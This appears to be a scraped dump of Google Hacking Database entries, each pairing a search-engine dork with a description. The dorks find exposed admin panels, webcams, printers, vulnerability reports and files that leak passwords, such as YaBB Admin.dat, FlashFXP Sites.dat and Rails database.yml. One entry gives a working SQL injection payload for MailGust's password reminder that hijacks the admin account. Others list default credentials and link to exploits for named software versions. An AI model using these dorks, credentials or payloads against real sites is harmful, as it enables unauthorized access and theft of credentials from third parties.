[[descr]MailGust 1.9/2.0 (possibly prior versions) SQL injection / board takevor<br>
<br>
software:<br>
site: http://www.mailgust.org/<br>
description:<br>
Mailgust is three softwares in one: <br>
* Mailing list manager <br>
* Newsletter distribution tool <br>
* Message Board <br>
Mailgust is written in php and uses a mysql database. <br>
<br>
vulnerability:<br>
<br>
if magic quotes off -> SQL Injection<br>
without to have an account, a user can send himself a new admin password using<br>
password reminder, in email field type:<br>
<br>
[yuor_email],'or'a'='a'/*@hotmail.com<br>
<br>
give a look to what happen:<br>
<br>
220 [MAILSERVER] SMTP Service ready<br>
HELO [MAILGUST]<br>
250 [MAILSERVER].<br>
MAIL FROM:<me@localhost.com><br>
250 MAIL FROM:<me@localhost.com> OK<br>
RCPT TO:<[your_email]><br>
250 RCPT TO:>[your_email] OK<br>
RCPT TO:<'or'a'='a'/*@hotmail.com><br>
250 RCPT TO:<'or'a'='a'/*@hotmail.com> OK<br>
DATA<br>
354 Start mail input; end with <CRLF>.<CRLF><br>
Date: Sat, 24 Sep 2005 16:11:38 +0100<br>
Subject: New password<br>
To: [your_email],'or'a'='a'/*@hotmail.com<br>
From: systemxxx@localhost.com<br>
Your login name is: [admin_email]<br>
Your new password is: 4993587<br>
Click here:<br>
http://localhost/mailgust/index.php?method=activate_new_password&list=maillistuser&pwd=4993587&id=1756185114<br>
to activate the password, than try to log in!<br>
<br>
It is recommended that you change your password afterwards.<br>
.<br>
250 <4335105B00009AE2> Mail accepted<br>
QUIT<br>
221 [MAILSERVER] QUIT<br>
<br>
vulnerable query is in [path_to_mailgust]/gorum/user_email.php at line 363:<br>
...<br>
$query = "SELECT * FROM $applName"."_$userClassName ".<br>
"WHERE email='$this->email'";<br>
...<br>
<br>
it becomes:<br>
<br>
SELECT * FROM maillist_maillistuser WHERE email='[yuor_email],'or'a'='a'/*@hotmail.com'<br>
<br>
"or'a'='a'" is always true, so the query is always true, <br>
script doesn't fail, for mail function, theese are two valid email address,<br>
it will send the mail to [your_email] and to 'or'a'='a'/*@hotmail.com ;)<br>
<br>
activate the password, now you can login with [admin_email] as user and new password<br>
<br>
u can find my poc exploit here:<br>
<br>
http://rgod.altervista.org/maildisgust.html<br>
<br>
[descr]]
[[url]http://www.google.com/search?hl=it&q=%22powered+by+mailgust%22&btnG=Cerca+con+Google&meta=[url]]
[[dork]"powered by mailgust"[dork]]
[end][1483]]
[[start][1484]
[[title]intitle:"Folder Listing" "Folder Listing" Name Size Date/Time File Folder[[title]]
[[descr]directory listing for Fastream NETFile Web Server[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Folder+Listing%22+%22Folder+Listing%22+Name+Size+Date%2FTime+File+Folder[url]]
[[dork]intitle:"Folder Listing" "Folder Listing" Name Size Date/Time File Folder[dork]]
[end][1484]]
[[start][1485]
[[title]"Directory Listing for" "Hosted by Xerver"[title]]
[[descr]directory listing for Xerver web server[descr]]
[[url]http://www.google.com/search?q=%22Directory+Listing+for%22+%22Hosted+by+Xerver%22[url]]
[[dork]"Directory Listing for" "Hosted by Xerver"[dork]]
[end][1485]]
[[start][1486]
[[title]intitle:"Supero Doctor III" -inurl:supermicro[[title]]
[[descr]"Supero Doctor III Remote Management" by Supermicro, Inc.<br>
<br>
info: http://www.supermicro.es/products/accessories/software/SuperODoctorIII.html<br>
<br>
just look for default password...[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Supero+Doctor+III%22+-inurl%3Asupermicro[url]]
[[dork]intitle:"Supero Doctor III" -inurl:supermicro[dork]]
[end][1486]]
[[start][1487]
[[title]intitle:"Netcam" intitle:"user login"[title]]
[[descr]just yet other online cam.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Netcam%22+intitle:%22user+login%22&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]intitle:"Netcam" intitle:"user login"[dork]]
[end][1487]]
[[start][1488]
[[title]Powered by PHP-Fusion v6.00.109 © 2003-2005. -php-fusion.co.uk[[title]]
[[descr]this is the dork: <br>
<br>
Powered by PHP-Fusion v6.00.109 © 2003-2005. -php-fusion.co.uk<br>
<br>
as it is, without quotes, for the version I tested, prone to<br>
SQL Injection / administrative credentials disclosure<br>
<br>
this my advisory/poc exploit: <br>
<br>
http://rgod.altervista.org/phpfusion600109.html <br>
[descr]]
[[url]http://www.google.com/search?q=Powered+by+PHP-Fusion+v6.00.109+%C2%A9+2003-2005.+-php-fusion.co.uk[url]]
[[dork]Powered by PHP-Fusion v6.00.109 © 2003-2005. -php-fusion.co.uk[dork]]
[end][1488]]
[[start][1489]
[[title]inurl:/yabb/Members/Admin.dat[[title]]
[[descr]This search will show you the Administrator password (very first line) on YaBB forums whose owners didnt configure the permissions correctly. Go up a directory to get a full memberlist (the .dat files have the passwords).<br>
[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3A%2Fyabb%2FMembers%2FAdmin.dat[url]]
[[dork]inurl:/yabb/Members/Admin.dat[dork]]
[end][1489]]
[[start][1491]
[[title]intitle:"Biromsoft WebCam" -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000[[title]]
[[descr]Brimsoft webcam software enables anyone with a webcam to easily create a webcam http server. This googledork looks for these webcam servers.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Biromsoft+WebCam%22+-4.0+-serial+-ask+-crack+-software+-a+-the+-build+-download+-v4+-3.01+-numrange:1-10000&num=100&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]intitle:"Biromsoft WebCam" -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000[dork]]
[end][1491]]
[[start][1492]
[[title](intitle:"VisionGS Webcam Software")|(intext:"Powered by VisionGS Webcam") -showthread.php -showpost.php -"Search Engine" -computersglobal.com -site:g[[title]]
[[descr]I don't know if the google query got submitted right because it looks truncated. here it is again:<br>
(intitle:"VisionGS Webcam Software")|(intext:"Powered by VisionGS Webcam") -showthread.php -showpost.php -"Search Engine" -computersglobal.com -site:golb.org -site:chat.ru -site:findlastminute.de -site:tricus.de -site:urlaubus.de -johnny.ihackstuff <br>
<br>
VisionGS webcam software enables anyone with a webcam to easily host a webcam http server. This dork finds those servers.[descr]]
[[url]http://www.google.com/search?q=%28intitle%3A%22VisionGS+Webcam+Software%22%29%7C%28intext%3A%22Powered+by+VisionGS+Webcam%22%29+-showthread.php+-showpost.php+-%22Search+Engine%22+-computersglobal.com+-site%3Agolb.org+-site%3Achat.ru+-site%3Afindlas[url]]
[[dork](intitle:"VisionGS Webcam Software")|(intext:"Powered by VisionGS Webcam") -showthread.php -showpost.php -"Search Engine" -computersglobal.com -site:golb.org -site:chat.ru -site:findlas[dork]]
[end][1492]]
[[start][1493]
[[title]"Powered By: lucidCMS 1.0.11"[title]]
[[descr]Lucid CMS 1.0.11 SQL Injection /Login bypass<br>
<br>
this is the dork for ther version I tested:<br>
"Powered By: lucidCMS 1.0.11"<br>
<br>
advisory/poc exploit:<br>
<br>
http://rgod.altervista.org/lucidcms1011.html<br>
<br>
we have an XSS even:<br>
<br>
http://packetstorm.linuxsecurity.com/0509-exploits/lucidCMS.txt[descr]]
[[url]http://www.google.com/search?q=%22Powered+By%3A+lucidCMS+1.0.11%22[url]]
[[dork]"Powered By: lucidCMS 1.0.11"[dork]]
[end][1493]]
[[start][1495]
[[title]inurl:login.jsp.bak[[title]]
[[descr]JSP programmer anyone? You can read this![descr]]
[[url]http://www.google.com/search?q=inurl:login.jsp.bak[url]]
[[dork]inurl:login.jsp.bak[dork]]
[end][1495]]
[[start][1496]
[[title]intitle:Mantis "Welcome to the bugtracker" "0.15 | 0.16 | 0.17 | 0.18"[title]]
[[descr]cross site scripting and sql injection vunerabilities were discovered in Mantis versions 0.19.2 or less. Mantis is a web-based bugtracking system written in PHP. <br>
<br>
Vunerability report at<br>
http://search.securityfocus.com/archive/1/411591/30/0/threaded[descr]]
[[url]http://www.google.com/search?q=intitle%3AMantis+%22Welcome+to+the+bugtracker%22+%220.15+%7C+0.16+%7C+0.17+%7C+0.18%22[url]]
[[dork]intitle:Mantis "Welcome to the bugtracker" "0.15 | 0.16 | 0.17 | 0.18"[dork]]
[end][1496]]
[[start][1497]
[[title]intitle:"IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603" intitle:"Live Images"[title]]
[[descr]This is a googledork for IQeye netcams. Some of which you can control how they tilt/zoom. The default admin username/password are root/system.[descr]]
[[url]http://www.google.com/search?q=intitle:%22IQeye302+%7C+IQeye303+%7C+IQeye601+%7C+IQeye602+%7C+IQeye603%22+intitle:%22Live+Images%22&num=100&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]intitle:"IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603" intitle:"Live Images"[dork]]
[end][1497]]
[[start][1499]
[[title]intitle:"urchin (5|3|admin)" ext:cgi[[title]]
[[descr]Gain access to Urchin analysis reports. [descr]]
[[url]http://www.google.com/search?q=intitle%3A%22urchin+%285%7C3%7Cadmin%29%22+ext%3Acgi[url]]
[[dork]intitle:"urchin (5|3|admin)" ext:cgi[dork]]
[end][1499]]
[[start][1500]
[[title]inurl:status.cgi?host=all[[title]]
[[descr]Nagios Status page. See what ports are being monitored as well as ip addresses.<br>
<br>
Be sure to check the google cached page first.[descr]]
[[url]http://www.google.com/search?num=30&q=inurl%3Astatus.cgi%3Fhost%3Dall+-cvs[url]]
[[dork]inurl:status.cgi?host=all -cvs[dork]]
[end][1500]]
[[start][1501]
[[title]inurl:polly/CP[[title]]
[[descr]You can get into admin panel without logging.[descr]]
[[url]http://www.google.com/search?complete=1&hl=en&q=inurl%3Apolly%2FCP[url]]
[[dork]inurl:polly/CP[dork]]
[end][1501]]
[[start][1502]
[[title]"News generated by Utopia News Pro" | "Powered By: Utopia News Pro"[title]]
[[descr]Utopia News Pro 1.1.3 (and prior versions) SQL Injection & XSS<br>
<br>
advisory & poc exploit:<br>
<br>
http://rgod.altervista.org/utopia113.html<br>
<br>
[descr]]
[[url]http://www.google.com/search?q=%22News+generated+by+Utopia+News+Pro%22+%7C+%22Powered+By%3A+Utopia+News+Pro%22[url]]
[[dork]"News generated by Utopia News Pro" | "Powered By: Utopia News Pro"[dork]]
[end][1502]]
[[start][1504]
[[title]"Cyphor (Release:" -www.cynox.ch[[title]]
[[descr]Cyphor 0.19 (possibly prior versions) SQL Injection / Board takeover / cross site scripting<br>
<br>
my advisory & poc exploit:<br>
<br>
http://rgod.altervista.org/cyphor019.html<br>
<br>
rgod<br>
<br>
Moderator PS: The software is longer maintained.[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Cyphor+%28Release%3A%22+-www.cynox.ch[url]]
[[dork]"Cyphor (Release:" -www.cynox.ch[dork]]
[end][1504]]
[[start][1505]
[[title]"Welcome to the versatileBulletinBoard" | "Powered by versatileBulletinBoard"[title]]
[[descr]versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)<br>
multiple SQL Injection vulnerabilities / login bypass / cross site scripting / information disclosure<br>
<br>
advisory:<br>
<br>
http://rgod.altervista.org/versatile100RC2.html[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Welcome+to+the+versatileBulletinBoard%22+%7C+%22Powered+by+versatileBulletinBoard%22[url]]
[[dork]"Welcome to the versatileBulletinBoard" | "Powered by versatileBulletinBoard"[dork]]
[end][1505]]
[[start][1506]
[[title]inurl:ocw_login_username[[title]]
[[descr]WEBppliance is a software application designed to automate the deployment and management of Web-hosting services. <br>
<br>
There is a bug in how this product does the Logon validation. This Search will take you directly into the Admin pages....U can delete an User....(Plz dont do that..)<br>
<br>
Enjoy,<br>
Night Hacker[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Aocw_login_username[url]]
[[dork]inurl:ocw_login_username[dork]]
[end][1506]]
[[start][1507]
[[title]intitle:Bookmarks inurl:bookmarks.html "Bookmarks[[title]]
[[descr]AFAIK are the bookmarks of Firefox, Netscape and Mozilla stored in bookmarks.html. It is often uploaded to serve as a backup, so it could reveal some juicy information.[descr]]
[[url]http://www.google.com/search?q=intitle%3ABookmarks+inurl%3Abookmarks.html+%22Bookmarks+Toolbar+Folder%22+%22Add+bookmarks+to+this+folder+to+see+them+displayed+on+the+Bookmarks+Toolbar%22[url]]
[[dork]intitle:Bookmarks inurl:bookmarks.html "Bookmarks Toolbar Folder" "Add bookmarks to this folder to see them displayed on the Bookmarks Toolbar"[dork]]
[end][1507]]
[[start][1509]
[[title]"Shadow Security Scanner performed a vulnerability assessment"[title]]
[[descr]This is a googledork to find vulnerability reports produced by Shadow Security Scanner. They contain valuable information which can be used to break into a system.[descr]]
[[url]http://www.google.com/search?q=%22Shadow+Security+Scanner+performed+a+vulnerability+assessment%22&num=100&hl=en&lr=&filter=1[url]]
[[dork]"Shadow Security Scanner performed a vulnerability assessment"[dork]]
[end][1509]]
[[start][1510]
[[title]"The following report contains confidential information" vulnerability -search[[title]]
[[descr]This googledork reveals vunerability reports from many different vendors. These reports can contain information which can help an attacker break into a system/network.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22The+following+report+contains+confidential+information%22+vulnerability+-search[url]]
[[dork]"The following report contains confidential information" vulnerability -search[dork]]
[end][1510]]
[[start][1511]
[[title]intitle:"Docutek ERes - Admin Login" -edu[[title]]
[[descr]Docutek Eres is software that helps libaries get an internet end to them. This dork finds the admin login in page. Using Docutek Eres you can look through course material amoung other things.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Docutek+ERes+-+Admin+Login%22+-edu&num=100&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]intitle:"Docutek ERes - Admin Login" -edu[dork]]
[end][1511]]
[[start][1512]
[[title]intitle:"Retina Report" "CONFIDENTIAL INFORMATION"[title]]
[[descr]This googledork finds vulnerability reports produced by eEye Retina Security Scanner. The information inside these reports can help an attacker break into a system/network.<br>
[descr]]
[[url]http://www.google.com/search?q=intitle:%22Retina+Report%22+%22CONFIDENTIAL+INFORMATION%22&num=100&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]intitle:"Retina Report" "CONFIDENTIAL INFORMATION"[dork]]
[end][1512]]
[[start][1513]
[[title]intitle:"CJ Link Out V1"[title]]
[[descr]A cross site scripting vunerability has been discovered in CJ linkout version 1.x. CJ linkout is a free product which allows you to easily let users connect to a different site with a frame at the top which links back to your site. The vulnerability report can be found at http://secunia.com/advisories/16970/ .[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=intitle%3A%22CJ+Link+Out+V1%22&btnG=Search[url]]
[[dork]intitle:"CJ Link Out V1"[dork]]
[end][1513]]
[[start][1514]
[[title]server-dbs "intitle:index of"[title]]
[[descr]Yes, people actually post their teamspeak servers on websites. Just look for the words superadmin in the files and the password trails it in plain text.[descr]]
[[url]http://www.google.com/search?as_q=server-dbs&num=100&hl=en&c2coff=1&btnG=Google+Search&as_epq=intitle%3Aindex+of&as_oq=&as_eq=&lr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&safe=images[url]]
[[dork]server-dbs[dork]]
[end][1514]]
[[start][1516]
[[title]inurl:"Sites.dat"+"PASS="[title]]
[[descr]FlashFXP has the ability to import a Sites.dat file into its current Sites.dat file, using this search query you are able to find websites misconfigured to share the flashfxp folder and subsequently the Sites.dat file containing all custom sites the victim has in their sitelist. the passwords are not clear text but if you import the sites.dat into flashfxp you can connect to the ftps and it automatically sends the password. you can also set flashfxp to not hide passwords and it will show you what the password is when it connects.[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3A%22Sites.dat%22%2B%22PASS%3D%22&btnG=Google+Search[url]]
[[dork]inurl:"Sites.dat"+"PASS="[dork]]
[end][1516]]
[[start][1518]
[[title]("port_255/home")|(inurl:"home?port=255")[[title]]
[[descr]Standered printer search. <br>
<br>
Moderator note: see also dork id=1221[descr]]
[[url]http://www.google.com/search?q=(%22port_255/home%22)%7C(inurl:%22home%3Fport%3D255%22)&num=100&hl=en&lr=&safe=off&filter=0[url]]
[[dork]("port_255/home")|(inurl:"home?port=255")[dork]]
[end][1518]]
[[start][1522]
[[title]"This page is for configuring Samsung Network Printer" | printerDetails.htm[[title]]
[[descr]Several different samsung printers[descr]]
[[url]http://www.google.com/search?hl=en&q=%22This+page+is+for+configuring+Samsung+Network+Printer%22+%7C+printerDetails.htm[url]]
[[dork]"This page is for configuring Samsung Network Printer" | printerDetails.htm[dork]]
[end][1522]]
[[start][1523]
[[title]log inurl:linklint filetype:txt -"checking"[title]]
[[descr]Linklint is an Open Source Perl program that checks links on web sites. This search finds the Linklint log directory. Complete site map able to be recreated, and if you go back one directory you can see all the other files generated by linklint. Thanks to CP for direction.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&safe=off&c2coff=1&q=log+inurl%3Alinklint+filetype%3Atxt+-%22checking%22&btnG=Search[url]]
[[dork]log inurl:linklint filetype:txt -"checking"[dork]]
[end][1523]]
[[start][1524]
[[title]inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php[[title]]
[[descr]Moodle <=1.6 blind SQL injection<br>
<br>
advisory & poc exploit:<br>
<br>
http://rgod.altervista.org/moodle16dev.html[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3Acourse%2Fcategory.php+%7C+inurl%3Acourse%2Finfo.php+%7C+inurl%3Aiplookup%2Fipatlas%2Fplot.php[url]]
[[dork]inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php[dork]]
[end][1524]]
[[start][1525]
[[title]"Powered by XOOPS 2.2.3 Final"[title]]
[[descr]XOOPS 2.2.3 Arbitrary local file inclusion<br>
<br>
This a generic dork for the version I tested, advisory & poc exploit:<br>
<br>
http://rgod.altervista.org/xoops_xpl.html<br>
[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Powered+by+XOOPS+2.2.3+Final%22[url]]
[[dork]"Powered by XOOPS 2.2.3 Final"[dork]]
[end][1525]]
[[start][1526]
[[title]inurl:"wfdownloads/viewcat.php?list="[title]]
[[descr]XOOPS WF_Downloads (2.05) module SQL injection<br>
<br>
This a specific dork, that searches XOOPS sites with WF_Downloads module installed, advisory & poc exploit:<br>
<br>
http://rgod.altervista.org/xoops_xpl.html[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3A%22wfdownloads%2Fviewcat.php%3Flist%3D%22[url]]
[[dork]inurl:"wfdownloads/viewcat.php?list="[dork]]
[end][1526]]
[[start][1527]
[[title]intitle:"OnLine Recruitment Program - Login" -johnny.ihackstuff[[title]]
[[descr]This is the Employer's Interface of eRecruiter, a 100% Paper Less Recruitment Solution implemented by Universal Virtual Office. The only time you need to use paper is when you give out the appointment letter.<br>
<br>
The access to the Employer's Zone is restricted to authorized users only. Please authenticate your identity.[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22OnLine+Recruitment+Program+-+Login%22+-johnny.ihackstuff[url]]
[[dork]intitle:"OnLine Recruitment Program - Login" -johnny.ihackstuff[dork]]
[end][1527]]
[[start][1528]
[[title]intitle:"EXTRANET * - Identification"[title]]
[[descr]WorkZone Extranet Solution login page. All portals are in french or spanish I belive.[descr]]
[[url]http://www.google.com/search?q=intitle:%22EXTRANET+*+-+Identification%22+-johnny.ihackstuff&hl=en&filter=0[url]]
[[dork]intitle:"EXTRANET * - Identification" -johnny.ihackstuff[dork]]
[end][1528]]
[[start][1529]
[[title]intitle:"EXTRANET login" -.edu -.mil -.gov -johnny.ihackstuff[[title]]
[[descr]This search finds many different Extranet login pages.<br>
[descr]]
[[url]http://www.google.com/search?q=intitle:%22EXTRANET+login%22+-.edu+-.mil+-.gov+-johnny.ihackstuff&num=100&hl=en&lr=&safe=off&filter=0[url]]
[[dork]intitle:"EXTRANET login" -.edu -.mil -.gov -johnny.ihackstuff[dork]]
[end][1529]]
[[start][1531]
[[title]intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press[[title]]
[[descr]HP WBEM Clients are WBEM enabled management applications that provide the user interface and functionality system administrators need to manage their environment. [descr]]
[[url]http://www.google.com/search?q=intitle:%22*-+HP+WBEM+Login%22+%7C+%22You+are+being+prompted+to+provide+login+account+information+for+*%22+%7C+%22Please+provide+the+information+requested+and+press+the+OK+button+to+complete+the+login+process%22+%7C+%22%3C![url]]
[[dork]intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press the OK button to complete the login process" | "<![dork]]
[end][1531]]
[[start][1533]
[[title]intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf[[title]]
[[descr]Novell GroupWise is a complete collaboration software solution that provides information workers with e-mail, calendaring, instant messaging, task management, and contact and document management functions. The leading alternative to Microsoft Exchange, GroupWise has long been praised by customers and industry watchers for its security and reliability. [descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22Novell+Web+Services%22+%22GroupWise%22+-inurl%3A%22doc%2F11924%22+-.mil+-.edu+-.gov+-filetype%3Apdf&btnG=Search&filter=0[url]]
[[dork]intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf[dork]]
[end][1533]]
[[start][1534]
[[title]"iCONECT 4.1 :: Login"[title]]
[[descr]This search finds the login page for iCONECTnxt, it enables firms to search, organize, and review electronic and document discovery information — including email, native files, and images — from anywhere in the world for easy collaboration with outside counsel, branch offices, and consultants. LAN and Web solutions available. [descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22iCONECT+4.1+%3A%3A+Login%22&btnG=Search[url]]
[[dork]"iCONECT 4.1 :: Login"[dork]]
[end][1534]]
[[start][1535]
[[title]"Powered by Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com -johnny.ihackstuff[[title]]
[[descr]Webmail login portals for Merak Email Server<br>
<br>
Merak Email Server Suite consists of multiple awards winner Merak Email Server core and optional components:<br>
<br>
* Email Server for Windows or Linux<br>
* Anti-Spam Protection<br>
* Anti-Virus Protection<br>
* Integrated WebMail Access<br>
* Instant Messaging<br>
* GroupWare <br>
<br>
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=%22Powered+by+Merak+Mail+Server+Software%22+-.gov+-.mil+-.edu+-site%3Amerakmailserver.com+-johnny.ihackstuff&filter=0[url]]
[[dork]"Powered by Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com -johnny.ihackstuff[dork]]
[end][1535]]
[[start][1536]
[[title]intitle:"Merak Mail Server Web Administration" -ihackstuff.com[[title]]
[[descr]User login pages for Merak Email Server Suite which consists of Merak Email Server core and optional components:<br>
<br>
* Email Server for Windows or Linux<br>
* Anti-Spam Protection<br>
* Anti-Virus Protection<br>
* Integrated WebMail Access<br>
* Instant Messaging<br>
* GroupWare<br>
<br>
more info: h**p://www.icewarp.com[descr]]
[[url]http://www.google.com/search?q=intitle:%22Merak+Mail+Server+Web+Administration%22+-ihackstuff.com&num=100&&filter=0[url]]
[[dork]intitle:"Merak Mail Server Web Administration" -ihackstuff.com[dork]]
[end][1536]]
[[start][1537]
[[title]ext:yml database inurl:config[[title]]
[[descr]Ruby on Rails is a MVC full-stack framework for development of web applications. There's a configuration file in this framework called database.yml that links the Rails with the DB. It contains all the info needed to access de DB including username and password in clear text.[descr]]
[[url]http://www.google.com/search?hl=en&q=ext%3Ayml+database+inurl%3Aconfig[url]]
[[dork]ext:yml database inurl:config[dork]]
[end][1537]]
[[start][1540]
[[title]"This is a restricted Access Server" "Javascript Not Enabled!"|"Messenger Express" -edu -ac[[title]]
[[descr]Mostly Login Pages for iPlanet Messenger Express, which is a web-based electronic mail program that enables end users to access their mailboxes using a browser. Messenger Express clients send mail to a specialized web server that is part of iPlanet Messaging Server. <br>
<br>
Thanks to the forum members for cleaning up the search.[descr]]
[[url]http://www.google.com/search?q=%22This+is+a+restricted+Access+Server%22+%22Javascript+Not+Enabled!%22%7C%22Messenger+Express%22+-edu+-ac&num=100&filter=0[url]]
[[dork]"This is a restricted Access Server" "Javascript Not Enabled!"|"Messenger Express" -edu -ac[dork]]
[end][1540]]
[[start][1541]
[[title]inurl:webvpn.html "login" "Please enter your"[title]]
[[descr]The Cisco WebVPN Services Module is a high-speed, integrated Secure Sockets Layer (SSL) VPN services module for Cisco products.[descr]]
[[url]http://www.google.com/search?q=inurl:webvpn.html+%22login%22+%22Please+enter+your%22&num=100&filter=0[url]]
[[dork]inurl:webvpn.html "login" "Please enter your"[dork]]
[end][1541]]
[[start][1542]
[[title]intitle:"SNOIE Intel Web Netport Manager" OR intitle:"Intel Web Netport Manager Setup/Status"[title]]
[[descr]Intel Netport Express Print Server.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22SNOIE+Intel+Web+Netport+Manager%22+OR+intitle%3A%22Intel+Web+Netport+Manager+Setup%2FStatus%22[url]]
[[dork]intitle:"SNOIE Intel Web Netport Manager" OR intitle:"Intel Web Netport Manager Setup/Status"[dork]]
[end][1542]]
[[start][1543]
[[title]"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-[[title]]
[[descr]iLo and related login pages !? Whoops.. [descr]]
[[url]http://www.google.com/search?q=%22Establishing+a+secure+Integrated+Lights+Out+session+with%22+OR+intitle:%22Data+Frame+-+Browser+not+HTTP+1.1+compatible%22+OR+intitle:%22HP+Integrated+Lights-Out+Login%22+%7C+%22Alert%27+panel+is+displayed,+you+must+selec[url]]
[[dork]"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-Out Login" | "Alert' panel is displayed, you must selec[dork]]
[end][1543]]
[[start][1544]
[[title]inurl:nnls_brand.html OR inurl:nnls_nav.html[[title]]
[[descr]Novell Nterprise Linux Services detection dork. Some of the features are:<br>
<br>
* iFolder<br>
* Samba<br>
* NetStorage<br>
* eDirectory Administration<br>
* Linux User Management<br>
* NMAS 2.3<br>
* NetMail 3.5<br>
* GroupWise 6.5<br>
* iPrint<br>
* Virtual Office[descr]]
[[url]http://www.google.com/search?q=inurl:nnls_brand.html+OR+inurl:nnls_nav.html&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]inurl:nnls_brand.html OR inurl:nnls_nav.html[dork]]
[end][1544]]
[[start][1545]
[[title]intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"[title]]
[[descr]An attacker may want to know about the antivirus software running. The description says he can check the status of the F-Secure Policy Manager Server's Host Module. He can also check the status of the Console Module, but only if he's reading the page from the local host.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Welcome+to+F-Secure+Policy+Manager+Server+Welcome+Page%22&filter=0[url]]
[[dork]intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"[dork]]
[end][1545]]
[[start][1546]
[[title]intitle:"Summit Management Interface" -georgewbush.org.uk[[title]]
[[descr]Extreme Networks Summit Switches Web admin pages. Server: Allegro-Software-RomPager/2.10 [descr]]
[[url]http://www.google.com/search?q=intitle:%22Summit+Management+Interface%22+-georgewbush.org.uk&num=50&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"Summit Management Interface" -georgewbush.org.uk[dork]]
[end][1546]]
[[start][1547]
[[title]intitle:Cisco "You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator"[title]]
[[descr]Login pages for Ciso VPN Concentrator stuff[descr]]
[[url]http://www.google.com/search?q=intitle:Cisco+%22You+are+using+an+old+browser+or+have+disabled+javascript.+You+must+use+version+4+or+higher+of+Netscape+Navigator/Communicator%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:Cisco "You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator"[dork]]
[end][1547]]
[[start][1548]
[[title]intitle:"Iomega NAS Manager" -ihackstuff.com[[title]]
[[descr]Login page dork for Iomega NAS Manager.. There's only 1 result for it now, but this could change in the future.[descr]]
[[url]http://www.google.com/search?&q=intitle%3A%22Iomega+NAS+Manager%22+-ihackstuff.com&filter=0[url]]
[[dork]intitle:"Iomega NAS Manager" -ihackstuff.com[dork]]
[end][1548]]
[[start][1549]
[[title]"This website was created with phpWebThings 1.4"[title]]
[[descr]http://www.google.com/search?hl=it&q=%22This+website+was+created+with+phpWebThings+1.4%22+&btnG=Cerca+con+Google&meta=<br>
"This website was created with phpWebThings 1.4" <br>
<br>
this is Secunia advisory:<br>
http://secunia.com/advisories/17410/<br>
<br>
and my exploit that show a new vulnerability in "msg" parameter:<br>
<br>
http://rgod.altervista.org/phpwebth14_xpl.html[descr]]
[[url]http://www.google.com/search?hl=it&q=%22This+website+was+created+with+phpWebThings+1.4%22+&btnG=Cerca+con+Google&meta=<br>
"This website was created with phpWebThings 1.4" <br>
<br>
this is Secunia advisory:<br>
http://secunia.com/advisories/17410/<br>
<br>
and my exploit that show a new vulnerability in "msg" parameter:<br>
<br>
http://rgod.altervista.org/phpwebth14_xpl.html</font><p><font class="pn-normal"><br><b>Click here for the Google search ==> <a class="pn-normal" href="[url]]
[[dork]"This website was created with phpWebThings 1.4" [dork]]
[end][1549]]
[[start][1550]
[[title]"site info for" "Enter Admin Password"[title]]
[[descr]This will take you to the cash crusader admin login screen. It is my first google hack.. also try adding index.php at the end, have fun people :)[descr]]
[[url]http://www.google.com/search?hl=en&q=%22site+info+for%22+%22Enter+Admin+Password%22&filter=0[url]]
[[dork]"site info for" "Enter Admin Password"[dork]]
[end][1550]]
[[start][1551]
[[title]inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin[[title]]
[[descr]***WARNING: This search uses google images, disable images unless you want your IP spewed across webpages!***<br>
